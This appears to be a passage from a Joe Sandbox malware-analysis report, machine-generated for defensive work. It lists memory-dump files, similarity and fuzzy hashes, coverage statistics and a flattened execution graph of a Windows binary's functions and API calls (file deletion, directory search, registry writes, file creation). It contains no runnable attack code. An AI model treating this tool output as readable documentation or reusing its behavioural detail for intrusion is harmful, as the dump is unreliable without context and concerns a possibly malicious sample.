                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                              • API String ID: 1211598281-2248577382
                                                                                                                                                                                                              • Opcode ID: e86905edea1ff1312e1e5010d920059bceae7f9a29b5ec9c9f75170627a4ed9e
                                                                                                                                                                                                              • Instruction ID: e21731753bf965ec08944c24d8aa13f214096b1c7a2a1f17da5b941d3255a11d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e86905edea1ff1312e1e5010d920059bceae7f9a29b5ec9c9f75170627a4ed9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E01A21E09886C1FB00BB359C915E6A261AF51730FE84331C07D826E19F2CA445C721
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9F9A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                                                                                              • String ID: RTL
                                                                                                                                                                                                              • API String ID: 3537982541-834975271
                                                                                                                                                                                                              • Opcode ID: 576d5e6c6381f79c549a6baf7b7f5f9973be6c1af48ec972e7550f1965791ab8
                                                                                                                                                                                                              • Instruction ID: 9ca7fd1ae0d0f1c84a7ab517d1f97421e61d617e8c1b43f80933fedc37eb99e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576d5e6c6381f79c549a6baf7b7f5f9973be6c1af48ec972e7550f1965791ab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD01751F0A6C6C2FF196B71A8457B752906B28B41E8C0038C90D0A394EF2CD088C725
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:16.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                                                                              Total number of Nodes:1366
                                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                                              execution_graph 3187 401941 3188 401943 3187->3188 3193 402c41 3188->3193 3194 402c4d 3193->3194 3238 40640a 3194->3238 3197 401948 3199 405afa 3197->3199 3280 405dc5 3199->3280 3202 405b22 DeleteFileW 3204 401951 3202->3204 3203 405b39 3206 405c59 3203->3206 3294 4063e8 lstrcpynW 3203->3294 3206->3204 3323 40672b FindFirstFileW 3206->3323 3207 405b5f 3208 405b72 3207->3208 3209 405b65 lstrcatW 3207->3209 3295 405d09 lstrlenW 3208->3295 3210 405b78 3209->3210 3213 405b88 lstrcatW 3210->3213 3215 405b93 lstrlenW FindFirstFileW 3210->3215 3213->3215 3215->3206 3222 405bb5 3215->3222 3216 405c82 3326 405cbd lstrlenW CharPrevW 3216->3326 3219 405c3c FindNextFileW 3219->3222 3223 405c52 FindClose 3219->3223 3220 405ab2 5 API calls 3224 405c94 3220->3224 3222->3219 3227 405bfd 3222->3227 3299 4063e8 lstrcpynW 3222->3299 3223->3206 3225 405c98 3224->3225 3226 405cae 3224->3226 3225->3204 3230 405450 24 API calls 3225->3230 3229 405450 24 API calls 3226->3229 3227->3219 3231 405afa 60 API calls 3227->3231 3233 405450 24 API calls 3227->3233 3300 405ab2 3227->3300 3308 405450 3227->3308 3319 4061ae MoveFileExW 3227->3319 3229->3204 3232 405ca5 3230->3232 3231->3227 3234 4061ae 36 API calls 3232->3234 3233->3219 3235 405cac 3234->3235 3235->3204 3246 406417 3238->3246 3239 406662 3240 402c6e 3239->3240 3271 4063e8 lstrcpynW 3239->3271 3240->3197 3255 40667c 3240->3255 3242 406630 lstrlenW 3242->3246 3243 40640a 10 API calls 3243->3242 3246->3239 3246->3242 3246->3243 3247 406545 GetSystemDirectoryW 3246->3247 3249 406558 GetWindowsDirectoryW 3246->3249 3250 40667c 5 API calls 3246->3250 3251 40640a 10 API calls 3246->3251 3252 4065d3 lstrcatW 3246->3252 3253 40658c SHGetSpecialFolderLocation 3246->3253 3264 4062b6 3246->3264 3269 40632f wsprintfW 3246->3269 3270 4063e8 lstrcpynW 3246->3270 3247->3246 3249->3246 3250->3246 3251->3246 3252->3246 3253->3246 3254 4065a4 SHGetPathFromIDListW CoTaskMemFree 3253->3254 3254->3246 3261 406689 3255->3261 3256 406704 CharPrevW 3260 4066ff 3256->3260 3257 4066f2 CharNextW 3257->3260 3257->3261 3258 406725 3258->3197 3260->3256 3260->3258 3261->3257 3261->3260 3262 4066de CharNextW 3261->3262 3263 4066ed CharNextW 3261->3263 3276 405cea 3261->3276 3262->3261 3263->3257 3272 406255 3264->3272 3267 4062ea RegQueryValueExW RegCloseKey 3268 40631a 3267->3268 3268->3246 3269->3246 3270->3246 3271->3240 3273 406264 3272->3273 3274 406268 3273->3274 3275 40626d RegOpenKeyExW 3273->3275 3274->3267 3274->3268 3275->3274 3277 405cf0 3276->3277 3278 405d06 3277->3278 3279 405cf7 CharNextW 3277->3279 3278->3261 3279->3277 3329 4063e8 lstrcpynW 3280->3329 3282 405dd6 3330 405d68 CharNextW CharNextW 3282->3330 3285 405b1a 3285->3202 3285->3203 3286 40667c 5 API calls 3292 405dec 3286->3292 3287 405e1d lstrlenW 3288 405e28 3287->3288 3287->3292 3290 405cbd 3 API calls 3288->3290 3289 40672b 2 API calls 3289->3292 3291 405e2d GetFileAttributesW 3290->3291 3291->3285 3292->3285 3292->3287 3292->3289 3293 405d09 2 API calls 3292->3293 3293->3287 3294->3207 3296 405d17 3295->3296 3297 405d29 3296->3297 3298 405d1d CharPrevW 3296->3298 3297->3210 3298->3296 3298->3297 3299->3222 3336 405eb9 GetFileAttributesW 3300->3336 3303 405adf 3303->3227 3304 405ad5 DeleteFileW 3306 405adb 3304->3306 3305 405acd RemoveDirectoryW 3305->3306 3306->3303 3307 405aeb SetFileAttributesW 3306->3307 3307->3303 3309 40546b 3308->3309 3318 40550d 3308->3318 3310 405487 lstrlenW 3309->3310 3311 40640a 17 API calls 3309->3311 3312 4054b0 3310->3312 3313 405495 lstrlenW 3310->3313 3311->3310 3315 4054c3 3312->3315 3316 4054b6 SetWindowTextW 3312->3316 3314 4054a7 lstrcatW 3313->3314 3313->3318 3314->3312 3317 4054c9 SendMessageW SendMessageW SendMessageW 3315->3317 3315->3318 3316->3315 3317->3318 3318->3227 3320 4061c2 3319->3320 3322 4061cf 3319->3322 3339 406034 3320->3339 3322->3227 3324 406741 FindClose 3323->3324 3325 405c7e 3323->3325 3324->3325 3325->3204 3325->3216 3327 405c88 3326->3327 3328 405cd9 lstrcatW 3326->3328 3327->3220 3328->3327 3329->3282 3331 405d85 3330->3331 3335 405d97 3330->3335 3332 405d92 CharNextW 3331->3332 3331->3335 3333 405dbb 3332->3333 3333->3285 3333->3286 3334 405cea CharNextW 3334->3335 3335->3333 3335->3334 3337 405abe 3336->3337 3338 405ecb SetFileAttributesW 3336->3338 3337->3303 3337->3304 3337->3305 3338->3337 3340 406064 3339->3340 3341 40608a GetShortPathNameW 3339->3341 3366 405ede GetFileAttributesW CreateFileW 3340->3366 3343 4061a9 3341->3343 3344 40609f 3341->3344 3343->3322 3344->3343 3346 4060a7 wsprintfA 3344->3346 3345 40606e CloseHandle GetShortPathNameW 3345->3343 3347 406082 3345->3347 3348 40640a 17 API calls 3346->3348 3347->3341 3347->3343 3349 4060cf 3348->3349 3367 405ede GetFileAttributesW CreateFileW 3349->3367 3351 4060dc 3351->3343 3352 4060eb GetFileSize GlobalAlloc 3351->3352 3353 4061a2 CloseHandle 3352->3353 3354 40610d 3352->3354 3353->3343 3368 405f61 ReadFile 3354->3368 3359 406140 3361 405e43 4 API calls 3359->3361 3360 40612c lstrcpyA 3362 40614e 3360->3362 3361->3362 3363 406185 SetFilePointer 3362->3363 3375 405f90 WriteFile 3363->3375 3366->3345 3367->3351 3369 405f7f 3368->3369 3369->3353 3370 405e43 lstrlenA 3369->3370 3371 405e84 lstrlenA 3370->3371 3372 405e8c 3371->3372 3373 405e5d lstrcmpiA 3371->3373 3372->3359 3372->3360 3373->3372 3374 405e7b CharNextA 3373->3374 3374->3371 3376 405fae GlobalFree 3375->3376 3376->3353 3377 4015c1 3378 402c41 17 API calls 3377->3378 3379 4015c8 3378->3379 3380 405d68 4 API calls 3379->3380 3390 4015d1 3380->3390 3381 401631 3383 401663 3381->3383 3384 401636 3381->3384 3382 405cea CharNextW 3382->3390 3386 401423 24 API calls 3383->3386 3397 401423 3384->3397 3395 40165b 3386->3395 3390->3381 3390->3382 3393 401617 GetFileAttributesW 3390->3393 3394 4015fa 3390->3394 3401 4059b9 3390->3401 3409 40599c CreateDirectoryW 3390->3409 3392 40164a SetCurrentDirectoryW 3392->3395 3393->3390 3394->3390 3404 40591f CreateDirectoryW 3394->3404 3398 405450 24 API calls 3397->3398 3399 401431 3398->3399 3400 4063e8 lstrcpynW 3399->3400 3400->3392 3412 4067c2 GetModuleHandleA 3401->3412 3405 405970 GetLastError 3404->3405 3406 40596c 3404->3406 3405->3406 3407 40597f SetFileSecurityW 3405->3407 3406->3394 3407->3406 3408 405995 GetLastError 3407->3408 3408->3406 3410 4059b0 GetLastError 3409->3410 3411 4059ac 3409->3411 3410->3411 3411->3390 3413 4067e8 GetProcAddress 3412->3413 3414 4067de 3412->3414 3416 4059c0 3413->3416 3418 406752 GetSystemDirectoryW 3414->3418 3416->3390 3417 4067e4 3417->3413 3417->3416 3419 406774 wsprintfW LoadLibraryExW 3418->3419 3419->3417 3877 4053c4 3878 4053d4 3877->3878 3879 4053e8 3877->3879 3880 405431 3878->3880 3881 4053da 3878->3881 3882 4053f0 IsWindowVisible 3879->3882 3888 405407 3879->3888 3883 405436 CallWindowProcW 3880->3883 3884 4043ab SendMessageW 3881->3884 3882->3880 3885 4053fd 3882->3885 3886 4053e4 3883->3886 3884->3886 3890 404d1a SendMessageW 3885->3890 3888->3883 3895 404d9a 3888->3895 3891 404d79 SendMessageW 3890->3891 3892 404d3d GetMessagePos ScreenToClient SendMessageW 3890->3892 3893 404d71 3891->3893 3892->3893 3894 404d76 3892->3894 3893->3888 3894->3891 3904 4063e8 lstrcpynW 3895->3904 3897 404dad 3905 40632f wsprintfW 3897->3905 3899 404db7 3900 40140b 2 API calls 3899->3900 3901 404dc0 3900->3901 3906 4063e8 lstrcpynW 3901->3906 3903 404dc7 3903->3880 3904->3897 3905->3899 3906->3903 3907 401e49 3908 402c1f 17 API calls 3907->3908 3909 401e4f 3908->3909 3910 402c1f 17 API calls 3909->3910 3911 401e5b 3910->3911 3912 401e72 EnableWindow 3911->3912 3913 401e67 ShowWindow 3911->3913 3914 402ac5 3912->3914 3913->3914 3915 40264a 3916 402c1f 17 API calls 3915->3916 3923 402659 3916->3923 3917 4026a3 ReadFile 3917->3923 3927 402796 3917->3927 3918 405f61 ReadFile 3918->3923 3919 4026e3 MultiByteToWideChar 3919->3923 3920 402798 3928 40632f wsprintfW 3920->3928 3921 405fbf 5 API calls 3921->3923 3923->3917 3923->3918 3923->3919 3923->3920 3923->3921 3924 402709 SetFilePointer MultiByteToWideChar 3923->3924 3925 4027a9 3923->3925 3923->3927 3924->3923 3926 4027ca SetFilePointer 3925->3926 3925->3927 3926->3927 3928->3927 3932 404dcc GetDlgItem GetDlgItem 3933 404e1e 7 API calls 3932->3933 3942 405037 3932->3942 3934 404ec1 DeleteObject 3933->3934 3935 404eb4 SendMessageW 3933->3935 3936 404eca 3934->3936 3935->3934 3937 404f01 3936->3937 3941 40640a 17 API calls 3936->3941 3983 40435f 3937->3983 3938 40511b 3940 4051c7 3938->3940 3949 405174 SendMessageW 3938->3949 3975 40502a 3938->3975 3944 4051d1 SendMessageW 3940->3944 3945 4051d9 3940->3945 3946 404ee3 SendMessageW SendMessageW 3941->3946 3942->3938 3947 404d1a 5 API calls 3942->3947 3966 4050a8 3942->3966 3943 404f15 3948 40435f 18 API calls 3943->3948 3944->3945 3952 4051f2 3945->3952 3953 4051eb ImageList_Destroy 3945->3953 3969 405202 3945->3969 3946->3936 3947->3966 3968 404f23 3948->3968 3954 405189 SendMessageW 3949->3954 3949->3975 3951 40510d SendMessageW 3951->3938 3956 4051fb GlobalFree 3952->3956 3952->3969 3953->3952 3958 40519c 3954->3958 3956->3969 3957 404ff8 GetWindowLongW SetWindowLongW 3960 405011 3957->3960 3970 4051ad SendMessageW 3958->3970 3959 405371 3961 405383 ShowWindow GetDlgItem ShowWindow 3959->3961 3959->3975 3962 405017 ShowWindow 3960->3962 3963 40502f 3960->3963 3961->3975 3986 404394 SendMessageW 3962->3986 3987 404394 SendMessageW 3963->3987 3966->3938 3966->3951 3967 404f73 SendMessageW 3967->3968 3968->3957 3968->3967 3971 404ff2 3968->3971 3972 404fc0 SendMessageW 3968->3972 3973 404faf SendMessageW 3968->3973 3969->3959 3974 404d9a 4 API calls 3969->3974 3979 40523d 3969->3979 3970->3940 3971->3957 3971->3960 3972->3968 3973->3968 3974->3979 3991 4043c6 3975->3991 3976 405347 InvalidateRect 3976->3959 3977 40535d 3976->3977 3988 404cd5 3977->3988 3978 40526b SendMessageW 3982 405281 3978->3982 3979->3978 3979->3982 3981 4052f5 SendMessageW SendMessageW 3981->3982 3982->3976 3982->3981 3984 40640a 17 API calls 3983->3984 3985 40436a SetDlgItemTextW 3984->3985 3985->3943 3986->3975 3987->3942 4005 404c0c 3988->4005 3990 404cea 3990->3959 3992 404489 3991->3992 3993 4043de GetWindowLongW 3991->3993 3993->3992 3994 4043f3 3993->3994 3994->3992 3995 404420 GetSysColor 3994->3995 3996 404423 3994->3996 3995->3996 3997 404433 SetBkMode 3996->3997 3998 404429 SetTextColor 3996->3998 3999 404451 3997->3999 4000 40444b GetSysColor 3997->4000 3998->3997 4001 404458 SetBkColor 3999->4001 4002 404462 3999->4002 4000->3999 4001->4002 4002->3992 4003 404475 DeleteObject 4002->4003 4004 40447c CreateBrushIndirect 4002->4004 4003->4004 4004->3992 4006 404c25 4005->4006 4007 40640a 17 API calls 4006->4007 4008 404c89 4007->4008 4009 40640a 17 API calls 4008->4009 4010 404c94 4009->4010 4011 40640a 17 API calls 4010->4011 4012 404caa lstrlenW wsprintfW SetDlgItemTextW 4011->4012 4012->3990 4013 4016cc 4014 402c41 17 API calls 4013->4014 4015 4016d2 GetFullPathNameW 4014->4015 4016 4016ec 4015->4016 4022 40170e 4015->4022 4018 40672b 2 API calls 4016->4018 4016->4022 4017 401723 GetShortPathNameW 4020 402ac5 4017->4020 4019 4016fe 4018->4019 4019->4022 4023 4063e8 lstrcpynW 4019->4023 4022->4017 4022->4020 4023->4022 4024 40234e 4025 402c41 17 API calls 4024->4025 4026 40235d 4025->4026 4027 402c41 17 API calls 4026->4027 4028 402366 4027->4028 4029 402c41 17 API calls 4028->4029 4030 402370 GetPrivateProfileStringW 4029->4030 4031 4044cf lstrlenW 4032 4044f0 WideCharToMultiByte 4031->4032 4033 4044ee 4031->4033 4033->4032 4034 404850 4035 40487c 4034->4035 4036 40488d 4034->4036 4095 405a32 GetDlgItemTextW 4035->4095 4038 404899 GetDlgItem 4036->4038 4044 4048f8 4036->4044 4040 4048ad 4038->4040 4039 404887 4042 40667c 5 API calls 4039->4042 4043 4048c1 SetWindowTextW 4040->4043 4047 405d68 4 API calls 4040->4047 4041 4049dc 4093 404b8b 4041->4093 4097 405a32 GetDlgItemTextW 4041->4097 4042->4036 4048 40435f 18 API calls 4043->4048 4044->4041 4049 40640a 17 API calls 4044->4049 4044->4093 4046 4043c6 8 API calls 4051 404b9f 4046->4051 4052 4048b7 4047->4052 4053 4048dd 4048->4053 4054 40496c SHBrowseForFolderW 4049->4054 4050 404a0c 4055 405dc5 18 API calls 4050->4055 4052->4043 4061 405cbd 3 API calls 4052->4061 4056 40435f 18 API calls 4053->4056 4054->4041 4057 404984 CoTaskMemFree 4054->4057 4058 404a12 4055->4058 4059 4048eb 4056->4059 4060 405cbd 3 API calls 4057->4060 4098 4063e8 lstrcpynW 4058->4098 4096 404394 SendMessageW 4059->4096 4063 404991 4060->4063 4061->4043 4066 4049c8 SetDlgItemTextW 4063->4066 4070 40640a 17 API calls 4063->4070 4065 4048f1 4068 4067c2 5 API calls 4065->4068 4066->4041 4067 404a29 4069 4067c2 5 API calls 4067->4069 4068->4044 4071 404a30 4069->4071 4072 4049b0 lstrcmpiW 4070->4072 4073 404a71 4071->4073 4081 405d09 2 API calls 4071->4081 4083 404ac9 4071->4083 4072->4066 4075 4049c1 lstrcatW 4072->4075 4099 4063e8 lstrcpynW 4073->4099 4075->4066 4076 404a78 4077 405d68 4 API calls 4076->4077 4078 404a7e GetDiskFreeSpaceW 4077->4078 4080 404aa2 MulDiv 4078->4080 4078->4083 4080->4083 4081->4071 4082 404b3a 4085 404b5d 4082->4085 4087 40140b 2 API calls 4082->4087 4083->4082 4084 404cd5 20 API calls 4083->4084 4086 404b27 4084->4086 4100 404381 EnableWindow 4085->4100 4089 404b3c SetDlgItemTextW 4086->4089 4090 404b2c 4086->4090 4087->4085 4089->4082 4092 404c0c 20 API calls 4090->4092 4091 404b79 4091->4093 4101 4047a9 4091->4101 4092->4082 4093->4046 4095->4039 4096->4065 4097->4050 4098->4067 4099->4076 4100->4091 4102 4047b7 4101->4102 4103 4047bc SendMessageW 4101->4103 4102->4103 4103->4093 4104 401b53 4105 402c41 17 API calls 4104->4105 4106 401b5a 4105->4106 4107 402c1f 17 API calls 4106->4107 4108 401b63 wsprintfW 4107->4108 4109 402ac5 4108->4109 4110 401956 4111 402c41 17 API calls 4110->4111 4112 40195d lstrlenW 4111->4112 4113 402592 4112->4113 4121 4014d7 4122 402c1f 17 API calls 4121->4122 4123 4014dd Sleep 4122->4123 4125 402ac5 4123->4125 4126 401f58 4127 402c41 17 API calls 4126->4127 4128 401f5f 4127->4128 4129 40672b 2 API calls 4128->4129 4130 401f65 4129->4130 4132 401f76 4130->4132 4133 40632f wsprintfW 4130->4133 4133->4132 4134 402259 4135 402c41 17 API calls 4134->4135 4136 40225f 4135->4136 4137 402c41 17 API calls 4136->4137 4138 402268 4137->4138 4139 402c41 17 API calls 4138->4139 4140 402271 4139->4140 4141 40672b 2 API calls 4140->4141 4142 40227a 4141->4142 4143 40228b lstrlenW lstrlenW 4142->4143 4144 40227e 4142->4144 4146 405450 24 API calls 4143->4146 4145 405450 24 API calls 4144->4145 4148 402286 4144->4148 4145->4148 4147 4022c9 SHFileOperationW 4146->4147 4147->4144 4147->4148 4149 40175c 4150 402c41 17 API calls 4149->4150 4151 401763 4150->4151 4152 405f0d 2 API calls 4151->4152 4153 40176a 4152->4153 4153->4153 4154 401d5d GetDlgItem GetClientRect 4155 402c41 17 API calls 4154->4155 4156 401d8f LoadImageW SendMessageW 4155->4156 4157 402ac5 4156->4157 4158 401dad DeleteObject 4156->4158 4158->4157 4159 4022dd 4160 4022e4 4159->4160 4161 4022f7 4159->4161 4162 40640a 17 API calls 4160->4162 4163 4022f1 4162->4163 4164 405a4e MessageBoxIndirectW 4163->4164 4164->4161 4165 401563 4166 402a6b 4165->4166 4169 40632f wsprintfW 4166->4169 4168 402a70 4169->4168 3421 4023e4 3422 402c41 17 API calls 3421->3422 3423 4023f6 3422->3423 3424 402c41 17 API calls 3423->3424 3425 402400 3424->3425 3438 402cd1 3425->3438 3428 402ac5 3429 402438 3430 402444 3429->3430 3442 402c1f 3429->3442 3433 402463 RegSetValueExW 3430->3433 3445 4031d6 3430->3445 3431 402c41 17 API calls 3434 40242e lstrlenW 3431->3434 3436 402479 RegCloseKey 3433->3436 3434->3429 3436->3428 3439 402cec 3438->3439 3460 406283 3439->3460 3443 40640a 17 API calls 3442->3443 3444 402c34 3443->3444 3444->3430 3446 403201 3445->3446 3447 4031e5 SetFilePointer 3445->3447 3464 4032de GetTickCount 3446->3464 3447->3446 3450 405f61 ReadFile 3451 403221 3450->3451 3452 4032de 42 API calls 3451->3452 3454 40329e 3451->3454 3453 403238 3452->3453 3453->3454 3455 4032a4 ReadFile 3453->3455 3457 403247 3453->3457 3454->3433 3455->3454 3457->3454 3458 405f61 ReadFile 3457->3458 3459 405f90 WriteFile 3457->3459 3458->3457 3459->3457 3461 406292 3460->3461 3462 402410 3461->3462 3463 40629d RegCreateKeyExW 3461->3463 3462->3428 3462->3429 3462->3431 3463->3462 3465 403436 3464->3465 3466 40330c 3464->3466 3467 402e8e 32 API calls 3465->3467 3477 40345d SetFilePointer 3466->3477 3473 403208 3467->3473 3469 403317 SetFilePointer 3475 40333c 3469->3475 3473->3450 3473->3454 3474 405f90 WriteFile 3474->3475 3475->3473 3475->3474 3476 403417 SetFilePointer 3475->3476 3478 403447 3475->3478 3481 406943 3475->3481 3488 402e8e 3475->3488 3476->3465 3477->3469 3479 405f61 ReadFile 3478->3479 3480 40345a 3479->3480 3480->3475 3482 406968 3481->3482 3483 406970 3481->3483 3482->3475 3483->3482 3484 406a00 GlobalAlloc 3483->3484 3485 4069f7 GlobalFree 3483->3485 3486 406a77 GlobalAlloc 3483->3486 3487 406a6e GlobalFree 3483->3487 3484->3482 3484->3483 3485->3484 3486->3482 3486->3483 3487->3486 3489 402eb7 3488->3489 3490 402e9f 3488->3490 3493 402ec7 GetTickCount 3489->3493 3494 402ebf 3489->3494 3491 402ea8 DestroyWindow 3490->3491 3492 402eaf 3490->3492 3491->3492 3492->3475 3493->3492 3496 402ed5 3493->3496 3503 4067fe 3494->3503 3497 402f0a CreateDialogParamW ShowWindow 3496->3497 3498 402edd 3496->3498 3497->3492 3498->3492 3507 402e72 3498->3507 3500 402eeb wsprintfW 3501 405450 24 API calls 3500->3501 3502 402f08 3501->3502 3502->3492 3504 40681b PeekMessageW 3503->3504 3505 406811 DispatchMessageW 3504->3505 3506 40682b 3504->3506 3505->3504 3506->3492 3508 402e81 3507->3508 3509 402e83 MulDiv 3507->3509 3508->3509 3509->3500 3751 4039e6 3752 403a01 3751->3752 3753 4039f7 CloseHandle 3751->3753 3754 403a15 3752->3754 3755 403a0b CloseHandle 3752->3755 3753->3752 3760 403a43 3754->3760 3755->3754 3758 405afa 67 API calls 3759 403a26 3758->3759 3761 403a51 3760->3761 3762 403a1a 3761->3762 3763 403a56 FreeLibrary GlobalFree 3761->3763 3762->3758 3763->3762 3763->3763 4177 401968 4178 402c1f 17 API calls 4177->4178 4179 40196f 4178->4179 4180 402c1f 17 API calls 4179->4180 4181 40197c 4180->4181 4182 402c41 17 API calls 4181->4182 4183 401993 lstrlenW 4182->4183 4185 4019a4 4183->4185 4184 4019e5 4185->4184 4189 4063e8 lstrcpynW 4185->4189 4187 4019d5 4187->4184 4188 4019da lstrlenW 4187->4188 4188->4184 4189->4187 4190 402868 4191 402c41 17 API calls 4190->4191 4192 40286f FindFirstFileW 4191->4192 4193 402897 4192->4193 4196 402882 4192->4196 4198 40632f wsprintfW 4193->4198 4195 4028a0 4199 4063e8 lstrcpynW 4195->4199 4198->4195 4199->4196 4200 40166a 4201 402c41 17 API calls 4200->4201 4202 401670 4201->4202 4203 40672b 2 API calls 4202->4203 4204 401676 4203->4204 3836 40176f 3837 402c41 17 API calls 3836->3837 3838 401776 3837->3838 3839 401796 3838->3839 3840 40179e 3838->3840 3875 4063e8 lstrcpynW 3839->3875 3876 4063e8 lstrcpynW 3840->3876 3843 40179c 3847 40667c 5 API calls 3843->3847 3844 4017a9 3845 405cbd 3 API calls 3844->3845 3846 4017af lstrcatW 3845->3846 3846->3843 3865 4017bb 3847->3865 3848 40672b 2 API calls 3848->3865 3849 405eb9 2 API calls 3849->3865 3851 4017cd CompareFileTime 3851->3865 3852 40188d 3854 405450 24 API calls 3852->3854 3853 401864 3855 405450 24 API calls 3853->3855 3864 401879 3853->3864 3856 401897 3854->3856 3855->3864 3857 4031d6 44 API calls 3856->3857 3859 4018aa 3857->3859 3858 4063e8 lstrcpynW 3858->3865 3860 4018be SetFileTime 3859->3860 3861 4018d0 FindCloseChangeNotification 3859->3861 3860->3861 3863 4018e1 3861->3863 3861->3864 3862 40640a 17 API calls 3862->3865 3866 4018e6 3863->3866 3867 4018f9 3863->3867 3865->3848 3865->3849 3865->3851 3865->3852 3865->3853 3865->3858 3865->3862 3870 405a4e MessageBoxIndirectW 3865->3870 3874 405ede GetFileAttributesW CreateFileW 3865->3874 3868 40640a 17 API calls 3866->3868 3869 40640a 17 API calls 3867->3869 3871 4018ee lstrcatW 3868->3871 3872 401901 3869->3872 3870->3865 3871->3872 3873 405a4e MessageBoxIndirectW 3872->3873 3873->3864 3874->3865 3875->3843 3876->3844 4205 4027ef 4206 4027f6 4205->4206 4209 402a70 4205->4209 4207 402c1f 17 API calls 4206->4207 4208 4027fd 4207->4208 4210 40280c SetFilePointer 4208->4210 4210->4209 4211 40281c 4210->4211 4213 40632f wsprintfW 4211->4213 4213->4209 4214 401a72 4215 402c1f 17 API calls 4214->4215 4216 401a7b 4215->4216 4217 402c1f 17 API calls 4216->4217 4218 401a20 4217->4218 4219 406af2 4220 406976 4219->4220 4221 4072e1 4220->4221 4222 406a00 GlobalAlloc 4220->4222 4223 4069f7 GlobalFree 4220->4223 4224 406a77 GlobalAlloc 4220->4224 4225 406a6e GlobalFree 4220->4225 4222->4220 4222->4221 4223->4222 4224->4220 4224->4221 4225->4224 4226 401573 4227 401583 ShowWindow 4226->4227 4228 40158c 4226->4228 4227->4228 4229 402ac5 4228->4229 4230 40159a ShowWindow 4228->4230 4230->4229 4231 402df3 4232 402e05 SetTimer 4231->4232 4233 402e1e 4231->4233 4232->4233 4234 402e6c 4233->4234 4235 402e72 MulDiv 4233->4235 4236 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 4235->4236 4236->4234 4238 401cf3 4239 402c1f 17 API calls 4238->4239 4240 401cf9 IsWindow 4239->4240 4241 401a20 4240->4241 4242 4014f5 SetForegroundWindow 4243 402ac5 4242->4243 4244 402576 4245 402c41 17 API calls 4244->4245 4246 40257d 4245->4246 4249 405ede GetFileAttributesW CreateFileW 4246->4249 4248 402589 4249->4248 3783 401b77 3784 401b84 3783->3784 3785 401bc8 3783->3785 3788 4022e4 3784->3788 3793 401b9b 3784->3793 3786 401bf2 GlobalAlloc 3785->3786 3787 401bcd 3785->3787 3789 40640a 17 API calls 3786->3789 3798 401c0d 3787->3798 3802 4063e8 lstrcpynW 3787->3802 3790 40640a 17 API calls 3788->3790 3789->3798 3792 4022f1 3790->3792 3797 405a4e MessageBoxIndirectW 3792->3797 3803 4063e8 lstrcpynW 3793->3803 3794 401bdf GlobalFree 3794->3798 3796 401baa 3804 4063e8 lstrcpynW 3796->3804 3797->3798 3800 401bb9 3805 4063e8 lstrcpynW 3800->3805 3802->3794 3803->3796 3804->3800 3805->3798 4250 4024f8 4260 402c81 4250->4260 4253 402c1f 17 API calls 4254 40250b 4253->4254 4255 402533 RegEnumValueW 4254->4255 4256 402527 RegEnumKeyW 4254->4256 4258 40288b 4254->4258 4257 402548 RegCloseKey 4255->4257 4256->4257 4257->4258 4261 402c41 17 API calls 4260->4261 4262 402c98 4261->4262 4263 406255 RegOpenKeyExW 4262->4263 4264 402502 4263->4264 4264->4253 4265 40167b 4266 402c41 17 API calls 4265->4266 4267 401682 4266->4267 4268 402c41 17 API calls 4267->4268 4269 40168b 4268->4269 4270 402c41 17 API calls 4269->4270 4271 401694 